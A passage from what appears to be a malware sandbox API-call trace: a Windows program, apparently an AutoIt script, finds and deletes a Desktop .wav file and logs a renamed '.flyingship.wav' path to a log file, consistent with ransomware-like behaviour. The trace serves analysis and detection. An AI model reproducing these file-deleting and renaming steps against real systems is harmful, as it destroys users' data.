hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.704] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.704] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav", lpFilePart=0x0) returned 0x3e [0161.706] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d25ab0, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0xbb9f920, ftLastAccessTime.dwHighDateTime=0x1d5d7fe, ftLastWriteTime.dwLowDateTime=0x5d11f80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x10f89, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="gx8HB3O7amX5sO9SwzMc.wav", cAlternateFileName="GX8HB3~1.WAV")) returned 0x90ae18 [0161.707] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gx8hb3o7amx5so9swzmc.wav")) returned 1 [0161.728] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d25ab0, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0xbb9f920, ftLastAccessTime.dwHighDateTime=0x1d5d7fe, ftLastWriteTime.dwLowDateTime=0x5d11f80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x10f89, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="gx8HB3O7amX5sO9SwzMc.wav", cAlternateFileName="GX8HB3~1.WAV")) returned 0 [0161.728] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0161.729] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.729] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0161.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0161.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0161.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0161.730] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0161.730] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0161.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0161.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.750] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0161.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0161.750] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0161.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.750] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0161.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0161.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.750] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0161.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0161.750] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.751] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.751] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0161.751] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.751] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa95010 [0161.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.751] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0161.751] ReadFile (in: hFile=0x138, lpBuffer=0xa85008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa85008*, lpNumberOfBytesRead=0x87f43c*=0x6d4, lpOverlapped=0x0) returned 1 [0161.752] ReadFile (in: hFile=0x138, lpBuffer=0xa85008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa85008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0161.752] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x6d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.752] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa95010 | out: hHeap=0x8a0000) returned 1 [0161.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0161.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.flyingship.wav\r\n", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0161.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4c) returned 0x923b28 [0161.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.flyingship.wav\r\n", cchWideChar=76, lpMultiByteStr=0x923b28, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 76 [0161.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0161.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0161.752] WriteFile (in: hFile=0x138, lpBuffer=0x923ad0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923ad0*, lpNumberOfBytesWritten=0x87f43c*=0x4b, lpOverlapped=0x0) returned 1 [0161.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0161.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.753] CloseHandle (hObject=0x138) returned 1 [0161.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa85008 | out: hHeap=0x8a0000) returned 1 [0161.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0161.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0161.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0161.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0161.756] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0161.756] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0161.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0161.757] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0161.757] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.757] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0161.758] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0161.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0161.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0161.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0161.759] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0161.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0161.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0161.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0161.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0161.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0161.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0161.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) 